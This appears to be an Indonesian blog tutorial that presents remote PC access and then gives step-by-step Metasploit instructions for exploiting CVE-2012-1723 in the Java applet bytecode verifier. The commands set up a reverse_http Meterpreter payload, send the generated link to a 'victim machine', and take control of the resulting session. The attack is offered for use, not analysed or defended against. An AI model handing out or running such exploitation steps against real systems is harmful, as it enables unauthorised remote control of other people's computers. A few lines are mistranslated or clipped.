sebelum masuk ke tutorialnya mari saya jelaskan sedikit tentang remote pc/ remote komputer.
remote pc / remote komputer adalah komputer yang pengguna tidak memiliki akses fisik, tapi yang ia dapat mengakses atau memanipulasi melalui beberapa jenis jaringan komputer .
Perangkat lunak desktop jarak jauh memungkinkan seseorang mengendalikan komputer jarak jauh dari komputer lain. Ada banyak alat untuk mengakses komputer dari jarak jauh, seperti SSH , klien Telnet , VNC , RemotePC, LogMeIn , TeamViewer , GoToMyPC , Perangkat Lunak Grafis Jarak Jauh , dsb.
jadi bagi yang sudah paham tentang remote pc sekarang kita masuk ke tutorialnya ya guys.
CVE-2012-1723: Ini adalah kerentanan di verifier bytecode HotSpot di mana pengoptimalan yang tidak valid atas instruksi GETFIELD / PUTFIELD / GETSTATIC / PUTSTATIC menyebabkan pemeriksaan jenis tidak mencukupi. File kelas yang dibuat khusus mungkin bisa menggunakan kekurangan ini untuk memotong batasan sandbox Java, dan memuat kelas tambahan untuk melakukan operasi berbahaya. Kerentanan tersebut dipublikasikan oleh Michael 'mihi' Schierl.
Kebutuhan:
Langkah 1: Luncurkan konsol Metasploit
Buka Terminal di Mesin Penyerang (Backtrack).
Ketik " msfupdate ", ini akan mengupdate metasploit dengan modul terbaru.
Sekarang ketik " msfconsole " untuk mendapatkan interaksi dengan kerangka Metasploit.
Langkah 2:
Ketik " use exploit/multi/browser/java_verifier_field_access " dan ikuti perintah di bawah ini:
msf exploit(java_verifier_field_access) > set PAYLOAD java/meterpreter/reverse_http
msf exploit(java_verifier_field_access) > set LHOST [Backtrack IP ADDRESS]
msf exploit(java_verifier_field_access) > exploit
Langkah 3:
Jika Anda mengikuti perintah di atas dengan benar, Anda akan mendapatkan hasil berikut.
opy url dan buka link di mesin korban. Begitu url dimuat di mesin korban, maka akan meluncurkan exploit dan menciptakan sesi baru.
Sekarang ketik " sesi ", ini akan menampilkan daftar sesi aktif.
Ketik " sesi -i 1 ", ini akan membuka koneksi ke sesi dengan id '1' dan membawa Anda ke Meterpreter. Meterpreter akan membantu Anda untuk berinteraksi / mengendalikan Target.
jadi sekarang anda sudah bisa mengakseskan remote pc dengan Mengeksploitasi Java Applet Field Bytecode Verifier Cache Remote Code Execution.
sampai jumpa di post selanjutnya
follow @andravsko